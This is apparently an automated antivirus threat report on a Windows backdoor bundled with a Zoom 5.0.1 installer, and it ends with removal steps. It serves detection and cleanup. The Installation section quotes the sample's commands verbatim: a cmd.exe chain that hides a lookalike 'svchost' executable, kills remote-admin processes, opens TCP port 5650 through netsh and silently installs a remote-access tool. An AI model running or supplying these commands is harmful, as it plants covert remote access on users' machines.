Trend Micro Security

Backdoor.Win32.ZAPIZ.THDBABO

May 20, 2020

 Alias:

HEUR:Trojan.Win32.Generic (Kaspersky)

 Platform:

Windows

 Risk rating:
 Damage potential:
 Distribution potential:
 Reported infections:


  • Threat type: Backdoor
  • Destructive: No
  • Encrypted:  
  • In the wild: Yes

  Overview


This malware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.


  Details

File size 16,156,300 bytes
File type EXE
Memory resident Yes
Date discovered May 20, 2020

Arrival Details

This malware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This malware adds the following processes:

  • cmd.exe /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svch\xc3\xaest.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svch\xc3\xaest.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svch\xc3\xaest.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svch\xc3\xaest.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svch\xc3\xaest.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
  • "%User Temp%\Zoom Meetings\5.0.1\setup.exe"
  • %User Temp%\Zoom Meetings\5.0.1\setup.exe
  • %User Temp%\Zoom Meetings\5.0.1\reg.exe shortcut "%Application Data%\Zoom\bin\Zoom.exe" "~$folder.desktop$" "Start Zoom"
  • "%System%\cmd.exe" /c attrib -h -s -r "%User Temp%\Zoom Meetings\5.0.1\*.*"
  • "%System%\cmd.exe" /c RMDIR /s/q "%User Temp%\Zoom Meetings"
  • taskkill /f /im rutserv.exe
  • taskkill /f /im rfusclient.exe
  • reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
  • netsh firewall add portopening TCP 5650 "Open Port 5650"
  • netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
  • "%System%\drivers\install.exe"
  • %System%\PING.EXE ping 127.0.0.1
  • .\Installer.exe
  • %User Temp%\7zS8C40EAE9\Installer.exe /addfwexception --bin_home="%Application Data%\Zoom\bin"
  • %Application Data%\Zoom\bin\Zoom.exe %Application Data%\Zoom\bin\Zoom.exe
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d 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 /f
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d 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
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d 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 /f
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Certificates /t REG_BINARY /d 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
  • cmd.exe /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720" /f
  • Zoom.exe --action=uploadFeedback
  • %Application Data%\Zoom\bin\Zoom.exe %Application Data%\Zoom\bin\Zoom.exe --action=preload --runaszvideo=TRUE
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d 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 /f
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d 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
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d 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 /f
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Certificates /t REG_BINARY /d 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
  • reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720" /f

(Note: %User Temp% is the current user's Temp folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Temp" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Local\Temp" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %Application Data% is the current user's Application Data folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Application Data" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Roaming" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %System% is the Windows system folder, which is usually "C:\Windows\System32" on all operating systems.)

It creates the following folders:

  • %Application Data%\Zoom\zoom_install_src
  • %Application Data%\Zoom\bin
  • %User Temp%\Zoom Meetings\5.0.1
  • %User Temp%\7zS8C40EAE9
  • %Application Data%\Zoom
  • %User Temp%\$inst
  • %Start Menu%\Programs\Zoom
  • %User Temp%\Zoom Meetings
  • %Application Data%\Zoom\uninstall
  • %Application Data%\Zoom\logs
  • %Application Data%\Zoom\data
  • %Application Data%\Zoom\reports

(Note: %Application Data% is the current user's Application Data folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Application Data" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Roaming" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %User Temp% is the current user's Temp folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Temp" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Local\Temp" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %Start Menu% is the current user's Start Menu folder, which is usually "C:\Windows\Start Menu" or "C:\Documents and Settings\<user name>\Start Menu" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit).)

Other System Modifications

It deletes the following files:

  • %Application Data%\Zoom\logs\zoo1A53.tmp
  • %Application Data%\Zoom\data\zoomus.db-journal
  • %Application Data%\Zoom\logs\zooDFC3.tmp
  • %Application Data%\Zoom\logs\zoo1F90.tmp
  • %Application Data%\Zoom\data\zoomus.tmp.db-journal

(Note: %Application Data% is the current user's Application Data folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Application Data" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Roaming" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit).)

It adds the following registry entries:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\DNS-Service
FailureActions = "{random characters}"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\DNS-Service\Parameters\
AppExit
(Default) = "Restart"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
DisplayName = "Zoom Meetings 5.0.1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
DisplayVersion = "5.0.1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
VersionMajor = "5"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
VersionMinor = "0"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
Publisher = "Zoom Video Communications, Inc."

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
DisplayIcon = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
UninstallString = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
InstallLocation = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
InstallSource = "%User Temp%"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
InstallDate = "20200109"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
Language = "1049"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
EstimatedSize = "25026"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
NoModify = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
NoRepair = "1"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
DisplayIcon = "%Application Data%\Zoom\bin\Zoom.exe"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
DisplayName = "Zoom"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
DisplayVersion = "5.0"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
EstimatedSize = "10000"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
HelpLink = "https://support.{BLOCKED}m.us/home"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
URLInfoAbout = "https://{BLOCKED}m.us"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
URLUpdateInfo = "https://{BLOCKED}m.us"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
Publisher = "Zoom Video Communications, Inc."

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
UninstallString = "%Application Data%\Zoom\uninstall\Installer.exe /uninstall"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
InstallLocation = "%Application Data%\Zoom\bin"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
NoModify = "1"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
NoRepair = "1"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Version = "1"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Path = "%Application Data%\Zoom\bin\npzoomplugin.dll"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
ProductName = "Zoom Video Plugin"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Description = "Zoom Video Plugin"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Vendor = "Zoom Video Communications, Inc."

HKEY_CURRENT_USER\Software\Classes\
.zoommtg
(Default) = "ZoomLauncher"

HKEY_CURRENT_USER\Software\Classes\
.zoommtg
Content Type = "application/x-zoommtg-launcher"

HKEY_CURRENT_USER\Software\Classes\
ZoomLauncher
(Default) = "Zoom Launcher - 3.0.1"

HKEY_CURRENT_USER\Software\Classes\
ZoomLauncher\shell\open\
command
(Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"

HKEY_CURRENT_USER\Software\Classes\
MIME\Database\Content Type\
application/x-zoommtg-launcher
Extension = ".zoommtg"

HKEY_CURRENT_USER\Software\Classes\
zoommtg
(Default) = "URL:Zoom Launcher"

HKEY_CURRENT_USER\Software\Classes\
zoommtg
URL Protocol = ""

HKEY_CURRENT_USER\Software\Classes\
zoommtg
UseOriginalUrlEncoding = "1"

HKEY_CURRENT_USER\Software\Classes\
zoommtg\DefaultIcon
(Default) = "%Application Data%\Zoom\bin\Zoom.exe,1"

HKEY_CURRENT_USER\Software\Classes\
zoommtg\shell\open\
command
(Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
explorer
GlobalAssocChangedCounter = "12"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
notification = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
Security = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
General = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
Certificates = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
DisplayName = "installer 20.0.9800.1720"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
DisplayVersion = "20.0.9800.1720"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
VersionMajor = "20"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
VersionMinor = "0"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
Publisher = "Company Inc."

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
DisplayIcon = "%User Temp%\Company Inc.\installer\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
UninstallString = "%User Temp%\Company Inc.\installer\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
InstallLocation = "%User Temp%\Company Inc.\installer"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
InstallSource = "%Windows%\SysWOW64\drivers"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
InstallDate = "20200109"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
Language = "1049"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
EstimatedSize = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
NoModify = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
NoRepair = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
explorer
GlobalAssocChangedCounter = "13"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
explorer
GlobalAssocChangedCounter = "14"

Dropping Routine

It drops the following files:

  • %Application Data%\Zoom\bin\util.dll
  • %Application Data%\Zoom\zoom_install_src\mcm.dll
  • %Application Data%\Zoom\bin\record_stop.pcm
  • %Application Data%\Zoom\zoom_install_src\leave.pcm
  • %Application Data%\Zoom\bin\leave.pcm
  • %Application Data%\Zoom\uninstall\Installer.exe
  • %Application Data%\Zoom\bin\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\asproxy.dll
  • %Application Data%\Zoom\bin\zTscoder.exe
  • %User Temp%\7zS8C40EAE9\Zoom.msi
  • %System%\drivers\libeay32.dll
  • %Application Data%\Zoom\zoom_install_src\zcacert.pem
  • %Application Data%\Zoom\data\zoomus.tmp.db
  • %Application Data%\Zoom\zoom_install_src\npzoomplugin.dll
  • %Application Data%\Zoom\bin\Zoom.exe
  • %Application Data%\Zoom\zoom_install_src\ring.pcm
  • %Application Data%\Zoom\bin\asproxy.dll
  • %System%\drivers\install.exe
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\reslib.dll
  • %Application Data%\Zoom\bin\record_start.pcm
  • %Application Data%\Zoom\zoom_install_src\dingdong1.pcm
  • %Application Data%\Zoom\bin\msaalib.dll
  • %Application Data%\Zoom\bin\zWebService.dll
  • %Application Data%\Zoom\bin\zcacert.pem
  • %Application Data%\Zoom\zoom_install_src\zChatUI.dll
  • %Application Data%\Zoom\bin\dingdong1.pcm
  • %Application Data%\Zoom\bin\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\zVideoUI.dll
  • %Application Data%\Zoom\zoom_install_src\zzhost.dll
  • %Application Data%\Zoom\bin\aomagent.dll
  • %Application Data%\Zoom\bin\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\CptInstall.exe
  • %Application Data%\Zoom\zoom_install_src\zChatApp.dll
  • %Application Data%\Zoom\bin\Droplet.pcm
  • %Application Data%\Zoom\zoom_install_src\XmppDll.dll
  • %Application Data%\Zoom\bin\reslib.dll
  • %Application Data%\Zoom\bin\dingdong.pcm
  • %Start Menu%\Programs\Zoom\Start Zoom.lnk
  • %Application Data%\Zoom\installer.txt
  • %Application Data%\Zoom\zoom_install_src\tp.dll
  • %Start Menu%\Programs\Zoom\Uninstall Zoom.lnk
  • %Application Data%\Zoom\zoom_install_src\record_start.pcm
  • %Application Data%\Zoom\bin\CptService.exe
  • %Application Data%\Zoom\bin\zzhost.dll
  • %Application Data%\Zoom\bin\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\XmppDll.dll
  • %Application Data%\Zoom\zoom_install_src\msaalib.dll
  • %Application Data%\Zoom\zoom_install_src\DuiLib.dll
  • %Application Data%\Zoom\zoom_install_src\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zCrashReport.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_chat_chime.pcm
  • %Application Data%\Zoom\zoom_install_src\CptControl.exe
  • %Application Data%\Zoom\bin\zChatApp.dll
  • %Application Data%\Zoom\zoom_install_src\libcrypto-1_1.dll
  • %Application Data%\Zoom\bin\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.dll
  • %Application Data%\Zoom\bin\DuiLib.dll
  • %Application Data%\Zoom\data\Zoom.us.ini
  • %Application Data%\Zoom\zoom_install_src\ZoomInstall.xml
  • %User Temp%\Zoom Meetings\5.0.1\setup.exe
  • %User Temp%\101.ico
  • %Application Data%\Zoom\zoom_install_src\zVideoApp.dll
  • %Application Data%\Zoom\bin\CptShare.dll
  • %Application Data%\Zoom\data\client.config
  • %Application Data%\Zoom\zoom_install_src\zWebService.dll
  • %Application Data%\Zoom\zoom_install_src\CptService.exe
  • %Application Data%\Zoom\data\zoomus.db
  • %Application Data%\Zoom\bin\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\libcrypto-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\ssb_sdk.dll
  • %Application Data%\Zoom\zoom_install_src\libfaac.dll
  • %System%\drivers\ssleay32.dll
  • %Application Data%\Zoom\bin\viper.dll
  • %Application Data%\Zoom\bin\Cmmlib.dll
  • %Application Data%\Zoom\zoom_install_src\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\npzoomplugin.dll
  • %Application Data%\Zoom\zoom_install_src\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\CptHost.exe
  • %Application Data%\Zoom\bin\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\duilib_license.txt
  • %User Temp%\CptShare.dll
  • %Application Data%\Zoom\bin\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Installer.exe
  • %Application Data%\Zoom\bin\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\zmb.dll
  • %Application Data%\Zoom\bin\zlt.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\zChatUI.dll
  • %Application Data%\Zoom\zoom_install_src\zlt.dll
  • %Application Data%\Zoom\bin\zWinRes.dll
  • %Application Data%\Zoom\zoom_install_src\CptShare.dll
  • %AppDataLocal%\GDIPFONTCACHEV1.DAT
  • %Application Data%\Zoom\zoom_install_src\duilib_license.txt
  • %Application Data%\Zoom\zoom_install_src\aomagent.dll
  • %Application Data%\Zoom\zoom_install_src\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\Droplet.pcm
  • %Application Data%\Zoom\bin\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\ring.pcm
  • %Application Data%\Zoom\zoom_install_src\nydus.dll
  • %Application Data%\Zoom\bin\zVideoUI.dll
  • %Application Data%\Zoom\bin\nydus.dll
  • %User Temp%\Zoom Meetings\5.0.1\reg.exe
  • %Application Data%\Zoom\bin\zmb.dll
  • %Application Data%\Zoom\zoom_install_src\zWinRes.dll
  • %System%\drivers\svch\xc3\xaest.exe
  • %Application Data%\Zoom\zoom_install_src\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\Installer.exe
  • %Application Data%\Zoom\zoom_install_src\record_stop.pcm
  • %Application Data%\Zoom\bin\ssb_sdk.dll
  • %Application Data%\Zoom\bin\libfaac.dll
  • %Application Data%\Zoom\bin\zVideoApp.dll
  • %Application Data%\Zoom\zoom_install_src\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\dingdong.pcm
  • %Application Data%\Zoom\zoom_install_src\zTscoder.exe
  • %Application Data%\Zoom\bin\mcm.dll
  • %Application Data%\Zoom\bin\CptHost.exe
  • %Application Data%\Zoom\appsafecheck.txt
  • %Application Data%\Zoom\zoom_install_src\util.dll
  • %Application Data%\Zoom\zoom_install_src\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Cmmlib.dll
  • %User Temp%\7zS8C40EAE9\Installer.exe
  • %Desktop%\Start Zoom.lnk
  • %Application Data%\Zoom\bin\directui_license.txt
  • %Application Data%\Zoom\zoom_install_src\directui_license.txt
  • %Application Data%\Zoom\bin\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\viper.dll
  • %Application Data%\Zoom\zoom_install_src\CptInstall.exe
  • %Application Data%\Zoom\bin\meeting_chat_chime.pcm
  • %Application Data%\Zoom\bin\ZoomInstall.xml
  • %Application Data%\Zoom\zoom_install_src\Zoom.exe
  • %Application Data%\Zoom\bin\CptControl.exe
  • %Application Data%\Zoom\bin\tp.dll

(Note: %Application Data% is the current user's Application Data folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Application Data" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Roaming" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %User Temp% is the current user's Temp folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Temp" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Local\Temp" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %System% is the Windows system folder, which is usually "C:\Windows\System32" on all operating systems. %Start Menu% is the current user's Start Menu folder, which is usually "C:\Windows\Start Menu" or "C:\Documents and Settings\<user name>\Start Menu" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %AppDataLocal% is the Local Application Data folder, which is usually "C:\Documents and Settings\<user name>\Local Settings\Application Data" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\AppData\Local" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit). %Desktop% is the current user's desktop, which is usually "C:\Documents and Settings\<user name>\Desktop" on Windows 2000 (32-bit), XP, and Server 2003 (32-bit), or "C:\Users\<user name>\Desktop" on Windows Vista, 7, 8, 8.1, 2008 (64-bit), 2012 (64-bit), and 10 (64-bit).)

Other Details

It connects to the following malicious websites:

  • http://{BLOCKED}m.us
  • {BLOCKED}.204.20
  • {BLOCKED}5.36.14

This threat report was generated by an automated analysis system.


  Solution

Minimum scan engine: 9.850

Step 1

Windows XP, Windows Vista, Windows 7, and Windows 10 users must disable System Restore before running a virus scan so that the malware or adware can be completely removed from the computer.

Step 2

Identify the files detected as Backdoor.Win32.ZAPIZ.THDBABO and terminate them.

[ Learn More ]

  • Windows Task Manager may not display all running processes. In that case, use a tool such as Process Explorer to terminate the malware file. For more information on Process Explorer, refer to this page.
  • A detected file may be displayed in Windows Task Manager or Process Explorer but still cannot be deleted. In that case, restart the computer in Safe Mode. For more information on Safe Mode, refer to this page.
  • If the detected file is not displayed in Task Manager, proceed to the next step.

Step 3

Delete these registry values.

[ Learn More ]

Warning: The registry is a database that stores Windows configuration information; incorrect registry edits can cause the system to stop working properly.
Registry edits are made at your own risk. We cannot provide compensation for any problems resulting from registry edits.
Before editing the registry, refer to this page.

  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DNS-Service
    • FailureActions = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DNS-Service\Parameters\AppExit
    • (Default) = "Restart"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • DisplayName = "Zoom Meetings 5.0.1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • DisplayVersion = "5.0.1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • VersionMajor = "5"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • VersionMinor = "0"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • Publisher = "Zoom Video Communications, Inc."
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • DisplayIcon = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • UninstallString = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • InstallLocation = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • InstallSource = "%User Temp%"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • InstallDate = "20200109"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • Language = "1049"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • EstimatedSize = "25026"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • NoModify = "1"
